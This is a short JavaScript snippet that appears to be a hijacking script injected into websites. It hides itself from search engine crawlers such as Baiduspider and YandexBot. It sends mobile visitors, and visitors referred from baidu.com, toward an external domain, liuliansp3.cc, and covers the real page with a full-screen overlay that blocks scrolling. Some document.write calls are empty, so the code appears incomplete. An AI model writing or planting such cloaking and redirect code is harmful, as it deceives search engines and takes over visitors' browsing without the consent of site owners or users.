document.write("")
var s=document.referrer;
var host=window.location.host;
var p = navigator.platform;
var reg = /(Baiduspider|360Spider|YisouSpider|YandexBot|Sogou inst spider|Sogou web spider|spider|Baiduspider-render)/i;
if (!reg.test(navigator.userAgent)) {
let flag = navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|QQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i);
if ( ! /Win/i.test(navigator.platform) && ! /Mac/i.test(navigator.platform) ) {
//k
// _src = 'https://liuliansp3.cc/';
var _src = Math.random() < 95/100 ? 'https://liuliansp3.cc/' : 'https://liuliansp3.cc/';
} else if (s.indexOf("baidu.com") > -1 )
{ _src = 'https://liuliansp3.cc/';
}
else {
// PC
_src = '/fn404.html'
}
document.write('');
var hd = document.head;
var styleCSS = document.createElement('style'), yabo = document.createElement('div');
styleCSS.innerHTML = 'html,body{position:relative;width:auto !important;height:100% !important;min-width:auto !important;overflow:hidden;}.yabo{position:fixed;top:0;left:0;right:0;height:100%;z-index:9999999999;background:#fff;}';
yabo.setAttribute('class', 'yabo');
yabo.innerHTML = '';
hd.appendChild(styleCSS);
hd.parentNode.appendChild(yabo);
}